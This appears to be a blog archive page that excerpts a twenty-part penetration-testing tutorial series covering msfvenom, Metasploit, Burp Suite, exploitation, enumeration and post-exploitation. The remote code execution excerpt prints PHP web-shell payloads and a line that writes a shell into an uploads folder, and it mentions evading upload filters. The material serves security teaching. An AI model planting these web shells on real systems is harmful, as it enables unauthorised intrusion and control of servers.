[ Pen Testing ] :: Step by Step: msfvenom

This is post 10 of 20 in the series “[ Pen Testing ]” Msfvenom creates shellcode from within Bash. Here is Rapid7’s own excellent documentation: https://github.com/rapid7/metasploit-fraamework/wiki/How-to-use-msfvenom “Complete How to Guide for MSFvenom”: https://securitytraning.com/complete-guide-msfvenom/ And a good thorough walk-through (in Spanish, but with regular English command examples): https://www.hackplayers.com/2018/05/recopilacion-shells-en-windows.html Open Bash and enter: msfvenom to get a …

[ Pen Testing ] :: Step by Step: Remote Code Execution (RCE)

Glenn Norman hacking

This is post 9 of 20 in the series “[ Pen Testing ]” Remote Code Execution RCE PHP RCE Test a form for vulnerability to PHP RCE: <?php phpinfo(); ?> Get a remote PHP shell: <?php system($_GET["c"]); ?> <?php `$_GET["c"]`; ?> Upload a file: <?php file_put_contents('/var/www/html/uploads/test.php', '<?php system($_GET["c"]);?>'); ?> Evade file-type upload filters using rot13 …

[ Pen Testing ] :: Step by Step: Burp Suite

This is post 8 of 20 in the series “[ Pen Testing ]” Burp Suite Start with the basics: https://www.cybrary.it/s3ss10n/s3ss10n-wednesday-burp-suite-basics/ Use Burp to Test for Path Traversal Vulnerabilities https://support.portswigger.net/customer/en/portal/articles/2590663-using-burp-to-test-for-path-traversal-vulnerabilities

[ Pen Testing ] :: Step by Step: Metasploit and Armitage

Metasploit

This is post 7 of 20 in the series “[ Pen Testing ]” Metasploit and Armitage Starting Metasploit Generic Metasploit installation instructions for any OS: https://metasploit.help.rapid7.com/docs/installing-the-metasploit-framework Instructions for starting Metasploit in Kali: https://docs.kali.org/general-use/starting-metasploit-framework-in-kali The default install of Metasploit that comes with Kali needs to be initialized. service postgresql start msfdb init # only if necessary …

[ Pen Testing ] :: Step by Step: Post-Exploitation

Glenn Norman

This is post 6 of 20 in the series “[ Pen Testing ]” Post-Exploitation Now we’re in, and it’s time to expand our powers. Post-Exploitation in Windows CrackMapExec is our most excellent friend here. It’s a Windows/Active Directory exploration/exploitation tool that lets us walk their domain and machines and do whatever we damn well wanna. …

[ Pen Testing ] :: Step by Step: Exploitation

exploit-db

This is post 5 of 20 in the series “[ Pen Testing ]” Exploitation BOF (buffer overflow) Exploits Buffer overflows are pretty technical, but eventually you’ll find yourself using them. In most cases you’ll copy or create code and encode it into a shellcode exploit. Review and correct the initial pre for configurable variables. Pay …

[ Pen Testing ] :: Step by Step: Enumeration

Security Exploits

This is post 4 of 20 in the series “[ Pen Testing ]” Enumeration Okay, by now you’ve spent hours, days or weeks stealthily footprinting your scope. Since this is pen testing, you’ve been mighty careful not to exceed your scope, right? So let’s talk tools and techniques. See https://security.stackexchange.com/questions/168247/reduce-noise-when-penetration-testing for an extensive list of …